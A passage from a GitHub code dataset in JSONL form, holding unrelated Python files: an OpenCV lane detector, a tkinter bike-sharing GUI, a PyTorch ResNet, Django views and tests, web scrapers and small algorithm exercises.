with yellow lanes\", np.hstack([cropped_image, output_yellow, output_white]))\r\ncv2.imshow('mask', mask_yellow)\r\n#cv2.imshow('mask2', mask_white)\r\ncv2.imshow('edges', edges)\r\n#cv2.imshow('edges2', edges2)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"eslamwael/Parking-Detection-with-digital-image-processing-","sub_path":"Parking detection with computer vision/Early modules/LaneDetection.py","file_name":"LaneDetection.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25685624302","text":"import tkinter as tk\n\nfrom tkinter import messagebox\n# using Pillow library for importing images from the system\nfrom PIL import ImageTk\nfrom tkinter import *\nimport time\n\nimport dbFun\nimport employee\n\n# storing not so easy string to remember in a variable so that it can be reusable\nbg_color = '#363636'\n\"\"\"\n#function for clearing the widgets\ndef clear_widgets(frame):\n #selecting all widgets within the frame\n for widget in frame.winfo_children():\n widget.destroy()\n\"\"\"\n\n\n# initialization\ndef config(window):\n window.title('ShareBike | Move - Operator')\n # window.eval(\"tk::PlaceWindow . center\")\n # taking the half of whatever screen this code would be running on\n width = window.winfo_screenwidth() // 2\n # would leave a 10% of gap from the top and bottom of the screen\n height = int(window.winfo_screenheight() * 0.1)\n # Setting the actual geometry now\n window.geometry('400x600+' + str(width) + '+' + str(height))\n\n main_frame = tk.Frame(window, width=400, height=600, bg=bg_color)\n view_report_frame = tk.Frame(window, bg=bg_color)\n\n for frame in (main_frame, view_report_frame):\n frame.grid(row=0, column=0)\n\n # initializing the main_frame\n def load_main_frame():\n main_frame.pack_propagate(\n False) # using a function which would prevent the child label element to affect the parent frame element\n # main_frame widgets\n main_logo = ImageTk.PhotoImage(file=\"ShareBike.png\")\n logo_widget = tk.Label(main_frame, image=main_logo, bg=bg_color, height=250, width=250)\n logo_widget.image = main_logo\n logo_widget.pack()\n\n # adding texts in the main_widget\n tk.Label(\n main_frame,\n text=\"Move a bike!\",\n bg=bg_color,\n fg=\"white\", # text color\n font=('TkMenuFont', 14)\n ).pack(pady=20) # pady is used to create a padding along the y axis\n\n tk.Label(\n main_frame,\n text=\"Select Vehicle ID -- Location\",\n bg=bg_color,\n fg=\"white\",\n ).place(x=130, y=320)\n\n selected_option = populate_dropdown(main_frame)\n\n tk.Label(\n main_frame,\n text=\"Select Location to Move\",\n bg=bg_color,\n fg=\"white\",\n ).place(x=130, y=380)\n\n location_selected = populate_dropdown_location(selected_option, main_frame)\n\n # Move Button\n tk.Button(\n main_frame,\n text='Move',\n font=(\"TkHeadingFont\", 10),\n bg='#191919',\n fg='white',\n activebackground='#000000',\n activeforeground='white',\n command=lambda: move_button(selected_option, location_selected)\n ).place(x=180, y=470)\n\n def populate_dropdown(move_vehicle_window):\n # selection = name_box.curselection()\n # print(selection)\n # print(name_box.get(selection[0]))\n # fetched_string_array = name_box.get(selection[0]).split(\"---\")\n # current_location = fetched_string_array[1]\n filtered_location = []\n vehicle_dtls = employee.track_vehicle()\n for vehicle_id, vehicle_dtls in vehicle_dtls.items():\n if vehicle_dtls[2] == 'VACANT':\n total_info = str(vehicle_id) + \"---\" + vehicle_dtls[3]\n filtered_location.append(total_info)\n clicked = StringVar(move_vehicle_window)\n if len(filtered_location) < 1:\n filtered_location.append(\"No Vehicle\")\n clicked.set(filtered_location[0])\n drop = OptionMenu(move_vehicle_window, clicked, *filtered_location)\n drop.place(x=130, y=345, width=\"150\")\n if filtered_location[0] == \"No Vehicle\":\n drop.configure(state=\"disabled\")\n return clicked\n\n def populate_dropdown_location(selected_vehicle, move_vehicle_window):\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n current_location = fetched_string_array[1]\n location_dct = employee.fetch_all_location_info_in_dict()\n filtered_location = []\n for key, value in location_dct.items():\n if value != current_location:\n filtered_location.append(value)\n clicked = StringVar(move_vehicle_window)\n clicked.set(\"Select Location\")\n drop = OptionMenu(move_vehicle_window, clicked, *filtered_location)\n drop.place(x=130, y=410, width=\"150\")\n\n def on_selected_location(name, index, mode):\n drop['menu'].delete(0, END)\n filtered_location.clear()\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n current_location = fetched_string_array[1]\n\n for item in location_dct.values():\n if item != current_location:\n filtered_location.append(item)\n\n for location in filtered_location:\n drop['menu'].add_command(label=location, command=lambda v=location: clicked.set(v))\n\n selected_vehicle.trace(\"w\", on_selected_location)\n\n return clicked\n\n def move_button(selected_vehicle, selected_loc):\n selected_location = selected_loc.get()\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n vehicle_id = fetched_string_array[0]\n location_id = dbFun.get_loc_id(selected_location)\n employee.move(vehicle_id, location_id)\n # location_dct = employee.fetch_all_location_info_in_dict()\n # location = find_location_id(location_dct, fetched_string_array[1])\n # time1 = time.time()\n # employee.update_vehicle_charge(vehicle_id, time1, \"VACANT\", location)\n messagebox.showinfo(\"Vehicle location changed\", \"Vehicle moved from \" + selection + \" to \" + selected_location)\n\n load_main_frame()\n","repo_name":"Basket-Fatty/ShareBike","sub_path":"sharebike_operator_move.py","file_name":"sharebike_operator_move.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28475568638","text":"import numpy as np\nimport cv2\nimport os\n\nimport object_detection as obj\n\n#test_videos information\nPATH_TO_TEST_VIDEO_DIR = \"cnn_class2_videos\"\nTEST_VIDEO_FILE = \"test\"\nTEST_VIDEO_PATH = os.path.join(PATH_TO_TEST_VIDEO_DIR,\"{}.mp4\".format(TEST_VIDEO_FILE))\n\n#video detection\nread = cv2.VideoCapture(TEST_VIDEO_PATH)\nif read.isOpened():\n print (\"read_success\")\n fps = int(read.get(cv2.CAP_PROP_FPS))\n width = int(read.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(read.get(cv2.CAP_PROP_FRAME_HEIGHT))\n size = (width,height)\n write = cv2.VideoWriter(\"{}.avi\".format(TEST_VIDEO_FILE),cv2.VideoWriter_fourcc('M','J','P','G'),5,size,True)\n\nif write.isOpened():\n print (\"write_success\") \n\nwhile(1):\n check,frame_np = read.read()\n if (check==False):\n break\n else:\n frame_np_expanded = np.expand_dims(frame_np, axis=0)\n output_dict = obj.run_inference_for_single_image(frame_np, obj.detection_graph)\n obj.vis_util.visualize_boxes_and_labels_on_image_array(\n frame_np,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n obj.category_index,\n instance_masks=output_dict.get('detection_masks'),\n use_normalized_coordinates=True,\n line_thickness=2)\n write.write(frame_np) \n","repo_name":"len6704/Object-Detection","sub_path":"video_detection.py","file_name":"video_detection.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70304766169","text":"# !/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n# File : resnet.py\n# Author :CodeCat\n# version :python 3.7\n# Software :Pycharm\n\"\"\"\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.model_zoo as model_zoo\n\n\nmodel_urls = {\n 'resnet50': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/resnet50-imagenet.pth',\n}\n\n\ndef conv3x3(in_channels, out_channels, stride=1):\n return nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_channels, out_channels, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.conv3 = nn.Conv2d(out_channels, out_channels * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_channels * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=1000):\n self.in_channels = 128\n super(ResNet, self).__init__()\n self.conv1 = conv3x3(3, 64, stride=2)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(64, 64)\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = conv3x3(64, 128)\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AvgPool2d(7, stride=1)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n def _make_layer(self, block, channels, block_nums, stride=1):\n downsample = None\n if stride != 1 or self.in_channels != channels * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.in_channels, channels * block.expansion, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(channels * block.expansion)\n )\n\n layers = []\n layers.append(block(self.in_channels, channels, stride, downsample))\n self.in_channels = channels * block.expansion\n for i in range(1, block_nums):\n layers.append(block(self.in_channels, channels))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.relu1(self.bn1(self.conv1(x)))\n x = self.relu2(self.bn2(self.conv2(x)))\n x = self.relu3(self.bn3(self.conv3(x)))\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n\ndef load_url(url, model_dir='./model_data', map_location=None):\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n filename = url.split('/')[-1]\n cached_file = os.path.join(model_dir, filename)\n if os.path.exists(cached_file):\n return torch.load(cached_file, map_location=map_location)\n else:\n return model_zoo.load_url(url, model_dir=model_dir)\n\n\ndef resnet50(pretrained=False, **kwargs):\n model = ResNet(Bottleneck, (3, 4, 6, 3), **kwargs)\n if pretrained:\n model.load_state_dict(load_url(model_urls['resnet50']), strict=False)\n return model","repo_name":"codecat0/CV","sub_path":"Semantic_Segmentation/PSPNet/nets/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"31"} +{"seq_id":"73592874649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.shortcuts import render_to_response,HttpResponse\nfrom Pet.models import Guy,sort\nfrom PIL import Image\n# Create your tests here.\ndef op(request):\n for i in range(10):\n user=Guy()\n user.username=\"北京用户\"+str(i+11)\n user.phone=i\n user.city=\"北京市\"\n user.address=\"理工宿舍#\"+str(i+11)\n user.experience=\"1年以下\"\n #user.seed=\"猫\"\n user.seed=\"狗\"\n user.price=\"100以内/天\"\n user.information=\"###\"\n user.animal_info=\"###\"\n user.quantity=0\n user.picture=\"\\static\\images\\e\"+str(i)+\".jpg\"\n user.score=-1\n user.save()\n return HttpResponse(\"

    注册成功!

    \")\n\ndef op2(request):\n for i in range(20):\n sort1=sort()\n sort1.username=\"上海用户\"+str(i+1)\n sort1.flag=0\n sort1.save()\n return HttpResponse(\"

    注册成功

    \")\n\n#im = Image.open('C:/Users/leibn/Documents/Django Projects/Django0427/Pet/static/images/UserhomeImages/768798.jpg')\n#image_resized = im.resize((480,280), Image.ANTIALIAS)\n#image_resized.save('C:/Users/leibn/Documents/Django Projects/Django0427/Pet/static/images/UserhomeImages/768798.jpg', 'jpeg')\n\n#这是在Github上进行的尝试.\n","repo_name":"LeibnizWang/Pet-Website","sub_path":"DjangoProject/Pet/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33628973889","text":"# REST Framework imports\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n# Roles and permissions\nfrom rolepermissions.decorators import has_permission_decorator\n# Models\nfrom task_server.models import IncidenceComment\n# Serializers\nfrom task_server.api.serializers.comments.index import IncidenceCommentSerializer, IncidenceCommentReadOnlySerializer\n# Utils\nfrom auth_server.utils.decodeJWT import decodeJWT\nfrom datetime import datetime as dt\n\n\n@api_view(['POST'])\n@has_permission_decorator('add_comment')\ndef createIncidenceComment(request):\n try:\n token = decodeJWT(request)\n if (token['is_admin'] and token['company_id'] == request.data['company']) \\\n or (token['company_id'] == request.data['company'] and token['roles'].count('manager') == 1):\n serializer = IncidenceCommentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({'data': serializer.data}, status=status.HTTP_201_CREATED)\n else:\n return Response({'error': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'error': 'You are not authorized to access this resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['GET'])\n@has_permission_decorator('view_comment')\ndef getIncidenceComments(request, pk):\n try:\n incidence_comments = IncidenceComment.objects.filter(incidence_id=pk)\n serializer = IncidenceCommentReadOnlySerializer(incidence_comments, many=True)\n return Response({'data': serializer.data}, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['PUT'])\n@has_permission_decorator('update_comment')\ndef updateIncidenceComment(request):\n try:\n token = decodeJWT(request)\n if token['company_id'] == request.data['company']:\n incidence_comment = IncidenceComment.objects.get(pk=request.data['incidence'])\n serializer = IncidenceCommentSerializer(incidence_comment, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({'data': serializer.data}, status=status.HTTP_200_OK)\n else:\n return Response({'error': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'error': 'You are not authorized to access this resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n@api_view(['PUT'])\n@has_permission_decorator('update_comment')\ndef updateIncidenceState(request):\n try:\n token = decodeJWT(request)\n if token['company_id'] == request.data['company']:\n incidence_comment = IncidenceComment.objects.get(pk=request.data['incidence'])\n incidence_comment.state = request.data['state']\n incidence_comment.save()\n return Response({'data': 'Incidence state updated'}, status=status.HTTP_200_OK)\n else:\n return Response({'error': 'You are not authorized to access this resource'},\n status=status.HTTP_401_UNAUTHORIZED)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)","repo_name":"andersonSanchezS/task_management","sub_path":"task_server/api/views/incidence_comment/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32956261293","text":"import datetime as dt\nimport pandas as pd\nimport json\nfrom twython import Twython\n\nstates = pd.read_csv('./files/States.csv')\nstates.head()\n\ncredentials = {} \ncredentials['APP_KEY'] = 'KEY' \ncredentials['APP_SECRET'] = 'KEY' \ncredentials['ACCESS_TOKEN'] = 'TOKEN' \ncredentials['ACCESS_SECRET'] = 'TOKEN'\n\nwith open(\"twitter_credentials.json\", \"w\") as file: \n json.dump(credentials, file)\n \n\nwith open(\"twitter_credentials.json\", \"r\") as file: \n creds = json.load(file)\n\n\npython_tweets = Twython(creds['APP_KEY'], creds['APP_SECRET'])\n\ngeo = states['Geo']\nsta = states['State']\npar = states['Political Party']\n\ndict_ = {'user': [], 'date': [], 'text': [], 'id':[], 'favorite_count': [], 'retweet_num': [], 'state': [], 'party': []} \nfor i in range(0,len(geo)):\n query = {'q': '#globalwarming', \n 'count': '100',\n 'lang': 'en',\n 'until': dt.datetime.today().strftime('%Y-%m-%d'),\n 'geocode': geo[i]}\n \n for status in python_tweets.search(**query)['statuses']: \n dict_['user'].append(status['user']['screen_name'])\n dict_['date'].append(status['created_at'])\n dict_['text'].append(status['text'])\n dict_['id'].append(status['id'])\n dict_['favorite_count'].append(status['favorite_count'])\n dict_['retweet_num'].append(status['retweet_count'])\n dict_['state'].append(sta[i])\n dict_['party'].append(par[i])\n \ndf = pd.DataFrame(dict_)\ndf.to_csv('./twitter_query.csv')\n","repo_name":"Dorigh/Global-warming","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22663872064","text":"#straight runs approach: identify the strictly increasing or strictly decreasing runs\n#straight run of length k will have candy amounts 1...k with total candy k(k+1)/2\n#run ends when it switches between increasing or decreasing.\n#also ends on a repeated rank - don't know what will happen after that\n#states are 1 (increasing), -1 (decreasing), 0 (new run, not sure if increasing or decreasing yet)\n\n#still can't get this to work, too many possible cases\n#current problem: [3,4,3,1] returns 6, should be 7\n#problem is it assumes ascending part [3,4] with length 2 will have candies 1+2 = 3,\n#but actually the distribution is [1,3,2,1,2,3] -> ascenting part [3,4] has total 4\n\n\ndef candies(n, arr):\n\tstate = 0\n\tprev = arr[0]\n\tcount = 1\n\tend = False\n\ttotal = 0\n\tfor i in range(1, len(arr)):\n\t\tcurrent = arr[i]\n\t\tif state == 0:\n\t\t\tif current > prev:\n\t\t\t\tstate = 1\n\t\t\t\tcount +=1\n\t\t\tif current < prev:\n\t\t\t\tstate = -1\n\t\t\t\tcount += 1\n\t\t\tif current == prev:\n\t\t\t\tend = True\n\t\t\t\t# total += count * (count+1)/2\n\t\t\t\t# count = 1\n\t\t\t\t# state = 0\n\t\telif state == 1:\n\t\t\tif current > prev:\n\t\t\t\tcount +=1\n\t\t\telse:\n\t\t\t\tend = True\n\t\t\t\t# total += count * (count+1)/2\n\t\t\t\t# count = 1\n\t\t\t\t# state = 0\n\t\telif state == -1:\n\t\t\tif current < prev:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tend = True\n\t\t\t# elif current > prev:\n\t\t\t# \t#end = True\n\t\t\t# \t#special case - count the repeated 1 in count, but not in total.\n\t\t\t# \ttotal += count * (count+1)/2\n\t\t\t# \ttotal -= 1\n\t\t\t# \tcount = 2\n\t\t\t# \tstate = 0\n\t\t\t# else: #equal - end run, starts from 1 again\n\t\t\t# \ttotal += count * (count+1)/2\n\t\t\t# \tcount = 1\n\t\t\t# \tstate = 0\n\t\tif end:\n\t\t\ttotal += count * (count+1)/2\n\t\t\tcount = 1\n\t\t\tif state == -1 and current > prev and (i == n -1 or arr[i+1] > current):\n\t\t\t\t#special case for overlapping 1 when decreasing run goes into increasing run\n\t\t\t\t#count from 2 instead, but subtract 1\n\t\t\t\tcount += 1\n\t\t\t\ttotal -= 1\n\t\t\tstate = 0\n\t\t\tend = False\n\t\tprev = current\n\t#add the last block at end of list\n\ttotal += count * (count+1)/2\n\treturn int(total)","repo_name":"c-rodwell/hackerrank","sub_path":"candies/straight_runs.py","file_name":"straight_runs.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34957088588","text":"import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {\n \"Home \": 'https://www.moneycontrol.com/',\n# \"Market\": 'https://www.moneycontrol.com/stocksmarketsindia/',\n# \"Mf Home\": 'https://www.moneycontrol.com/mutualfundindia/'\n}\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html,\"lxml\")\n elements = soup.find_all('div')[-1]\n return elements.text\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return (csv_reader[-1])\n\nfor page,url_value in url.items():\n print (page,get_last_element_timestamp(url_value))\n# print page\n##\nbse_info_csv=\"http://www.moneycontrol.com/tech_charts/bse/his/it.csv\"\nnse_info_csv = \"http://www.moneycontrol.com/tech_charts/nse/his/it.csv\"\nhistoric_sensex = \"http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv\"\nhistoric_nifty = \"http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv\"\nprint(\"Historic csv infosys => BSE\")\nprint(historic_data(bse_info_csv))\nprint (\"Historic csv of infosys => NSE\")\nprint(historic_data(nse_info_csv)) \nprint (\"Historic csv of sensex \")\nprint(historic_data(historic_sensex))\nprint (\"Historic csv of nifty\")\nprint (historic_data(historic_nifty)) \n\n\n\n\n","repo_name":"abhijeetgk/python-parse","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29663970381","text":"# 그리디\ndef is_palindrome(s, start, end):\n for i in range((end - start) // 2 + 1):\n if s[start + i] != s[end - i]:\n return False\n\n return True\n\n\ndef solution(s):\n for answer in range(len(s), 0, -1): # 문자열 최대 길이에서 하나씩 줄여나갑니다.\n start = 0 # 0에서\n end = answer - 1 # answer 길이까지\n\n while end < len(s):\n if is_palindrome(s, start, end): # 팰린드롬인지 확인합니다\n return answer # 팰린드롬이면 그대로 리턴\n start += 1\n end += 1 # 한 칸씩 순회합니다.\n\n return 1 # 한 글자일 경우 1을 리턴합니다.\n\n\n# # Manacher 알고리즘\n# def solution(s):\n# r, p = 0, 0\n\n# S = sum([[s[i], '#'] for i in range(len(s))], ['#'])\n\n# A = [0] * len(S)\n\n# for i in range(1, len(S) - 1):\n# if i < r:\n# A[i] = min(A[2 * p - i], r - i)\n\n# while i + A[i] - 1 >= 0 and i + A[i] + 1 < len(S) and S[i - A[i] - 1] == S[i + A[i] + 1]:\n# A[i] += 1\n\n# if i + A[i] > r:\n# r = i + A[i]\n# p = i\n\n# return max(A)\n\n\n# # 응용\n# def solution(s):\n# p = 0\n\n# for i in range(len(s)):\n# if s[i - p:i + 1] == s[i - p:i + 1][::-1]:\n# p += 1\n# elif i - p > 0 and s[i - p - 1:i + 1] == s[i - p - 1:i + 1][::-1]:\n# p += 2\n\n# return p\n","repo_name":"InSeong-So/Algorithm","sub_path":"python/problem/prgrms/week04-sorting_dynamic/07_가장긴펠린드럼.py","file_name":"07_가장긴펠린드럼.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"41130261985","text":"\"\"\"\n How to using Desc Class\n\"\"\"\nclass Desc(object):\n \"\"\"This is the Descriptor class,\n it has __get__, __set__, __delete__ function\n \"\"\"\n def __get__(self, inst, type):\n print('get', self, inst, type)\n\n def __set__(self, inst, value):\n print('set', self, inst, value)\n\n\nclass Demo(object):\n desc = Desc()\n\n\nclass DemoInst(object):\n def __init__(self):\n self.desc = Desc()\n\n# Only class property will call __get__ and __set__ method\ndemo = Demo()\nprint(demo)\ndemo.desc\ndemo.desc = 'my desc'\nprint(\"--------------\")\n\n# Instance property will't call __get__ and __set__method\ndemoInst = DemoInst()\nprint(demoInst)\ndemoInst.desc\ndemoInst.desc = \"my desc\"\n\nprint(demo.__dict__)\nprint(\"--------------\")\nprint(demoInst.__dict__)\n","repo_name":"xiangtian/pytest","sub_path":"desc_test.py","file_name":"desc_test.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37209987801","text":"def date_parser(dates):\n\n \"\"\"\n A function that takes a list of datetime strings and returns only a string of dates in the 'yyyy-mm-dd' format.\n\n The input is a list of datetime strings in the formate 'yyyy-mm-dd hh:mm:ss' and the output is only the date in the 'yyyy-mm-dd' format.\n\n Args:\n dates(list): list of datetime strings\n\n returns:\n list: lists of only the date strings\n\n Example:\n >>> date_parser(dates[:3])\n ['2019-11-29', '2019-11-29', '2019-11-29']\n \"\"\"\n\n #Initializing an empty list to append a new list in\n mylist= []\n\n #slicing only the dates from the old list and appending to a new list\n for date in dates:\n mylist.append(date[:10])\n\n #returning a new list with only a string of dates.\n return mylist\n","repo_name":"banelengemntu123/Eskom24Analyse","sub_path":"eskomfunctions/function3.py","file_name":"function3.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42980185747","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\nclass SQLHandler:\n \"\"\"Classe per gestire il caricamento dei dati in un database SQL.\"\"\"\n\n def __init__(self, original_data, conn_string, schema):\n self.original_data = original_data\n self.conn_string = conn_string\n self.schema = schema\n # creazione dell' istanza 'engine' per il database\n self.engine = create_engine(self.conn_string)\n\n def load_original_data(self, table_name):\n try:\n self.original_data.to_sql(table_name, \n self.engine, \n schema=self.schema, \n if_exists='replace', \n index=False)\n except Exception as error:\n print(f\"Error loading original data: {error}\")\n\n\n def close_connection(self):\n self.engine.dispose()","repo_name":"LorenzoMorabito/Google_play_store_project","sub_path":"src/database_handler.py","file_name":"database_handler.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74426408408","text":"from django.conf.urls import url\nfrom apps.crud_tipousuario.views import tipoCreate, tipoList, tipoDelete, tipoUpdate, tipoShow, search\n\nurlpatterns = [\n url(r'^nuevo/', tipoCreate.as_view(), name='tipocrear'),\n url(r'^listar/', tipoList.as_view(), name='tipolistar'),\n url(r'^eliminar/(?P\\d+)/$', tipoDelete.as_view(), name='tipoeliminar'),\n url(r'^modificar/(?P\\d+)/$', tipoUpdate.as_view(), name='tipoeditar'),\n url(r'^mostrar/(?P\\d+)/$', tipoShow.as_view(), name='tipomostrar'),\n url(r'^buscar/$', search, name='tipobuscar'),\n]\n","repo_name":"ismaelzoto/Sistema-tutor-inteligente","sub_path":"apps/crud_tipousuario/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30001568068","text":"from nbformat import write\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom openpyxl import Workbook\r\n\r\nres = requests.get(\"https://finance.naver.com/\")\r\nhtml = res.content \r\n\r\nsoup = BeautifulSoup(html, 'html.parser')\r\n# print(soup)\r\n\r\na = soup.select('#container > div.aside > div > div.aside_area.aside_popular > table > tbody')\r\n# for i in a:\r\n# print(i.get_text())\r\n\r\ntbody =soup.select_one('#container > div.aside > div > div.aside_area.aside_popular > table > tbody')\r\n\r\ntrs = tbody.select('tr')\r\nprint(trs)\r\ndatas = []\r\nfor i in trs:\r\n name = i.select_one('th > a').get_text()\r\n cur_price = i.select_one('td').get_text()\r\n ch_direction = i.select_one('td > img')['alt']\r\n ch_updown = i.select_one('td > span').get_text().strip()\r\n \r\n datas.append([name, cur_price, ch_direction, ch_updown])\r\nprint(datas)\r\n\r\nwrite_wb =Workbook()\r\nwrite_ws = write_wb.create_sheet('결과')\r\n\r\nfor i in datas:\r\n write_ws.append(i)\r\n\r\nwrite_wb.save(r'financeWork.xls')\r\n\r\n","repo_name":"thansd51/python","sub_path":"day04/d4_crawling05.py","file_name":"d4_crawling05.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41873530505","text":"APP_NAME = 'Generador de Backups'\nAPP_VERSION = \"0.2.0_alpha\" # Mantener doble comillas para el CI\n\nclass Config:\n class Application:\n ROOT = 'app'\n DEBUG_MODE = 'debugMode'\n SECRET_KEY = 'secretKey'\n\n class BBDD:\n ROOT = 'bbdd'\n ENGINE = 'engine'\n NAME = 'name'\n\n class DjangoRQ:\n ROOT = 'djangoRQ'\n DASHBOARD = 'dashboard'\n DB = 'db'\n HOST = 'host'\n PORT = 'port'\n TIMEOUT = 'timeout'\n\n class Log:\n ROOT = 'log'\n NUMBER_FILES_LOG = 'numberOfLogsFile'\n LEVEL_LOG = 'levelLog'\n PATH = 'path'\n\n class MQTT:\n ROOT = 'mqtt'\n SWITCH_ENABLED = 'enabled'\n PASS = 'password'\n SERVER = 'server'\n USER = 'username'\n\nclass Backup:\n STATUS_COMPLETE: str = 'COMPLETE'\n STATUS_ERROR: str = 'ERROR'\n STATUS_PDTE: str = 'PDTE'\n\nclass MQTT:\n TOPIC: str = '/taixBackups/'\n BACKUP_GLOBAL: str = 'global'\n","repo_name":"TaixMiguel/TaixBackups","sub_path":"app/kTaixBackups.py","file_name":"kTaixBackups.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31794800080","text":"\"\"\"\n1、给定一个m * n要素的矩阵。按照螺旋顺序,返回该矩阵的所有要素\n [[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]]\n 应该返回[1, 2, 3, 6, 9, 8, 7, 4, 